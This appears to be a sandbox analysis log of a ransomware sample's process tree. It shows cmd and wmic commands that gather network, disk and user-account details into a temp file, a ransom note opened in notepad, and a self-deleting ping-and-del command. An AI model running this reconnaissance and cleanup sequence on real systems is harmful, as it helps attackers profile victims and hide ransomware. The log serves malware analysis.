C:\Windows\SysWOW64\cmd.execmd /c "echo NIC INFO: >> %TEMP%\DHPMDAPUF"2⤵PID:2244
-
-
C:\Windows\SysWOW64\cmd.execmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\DHPMDAPUF"2⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic NIC get Description, MACAddress, NetEnabled, Speed3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo DISKDRIVE INFO: >> %TEMP%\DHPMDAPUF"2⤵PID:3344
-
-
C:\Windows\SysWOW64\cmd.execmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\DHPMDAPUF"2⤵PID:4020
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic DISKDRIVE get InterfaceType, Name, Size, Status3⤵PID:3364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo USERACCOUNT INFO: >> %TEMP%\DHPMDAPUF"2⤵PID:2196
-
-
C:\Windows\SysWOW64\cmd.execmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\DHPMDAPUF"2⤵PID:2256
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic USERACCOUNT get Caption, Name, PasswordRequired, Status3⤵PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo IPCONFIG: >> %TEMP%\DHPMDAPUF"2⤵PID:3868
-
-
C:\Windows\SysWOW64\cmd.execmd /c "ipconfig >> %TEMP%\DHPMDAPUF"2⤵PID:3908
-
C:\Windows\SysWOW64\ipconfig.exeipconfig3⤵
- Gathers network information
PID:3924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo DATABASES FILES: >> %TEMP%\DHPMDAPUF"2⤵PID:1656
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2916
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\enc.exe"2⤵PID:2504
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30003⤵
- Runs ping.exe
PID:1920
-
-
-
C:\Windows\system32\MusNotification.exeC:\Windows\system32\MusNotification.exe1⤵
- Checks processor information in registry
PID:1196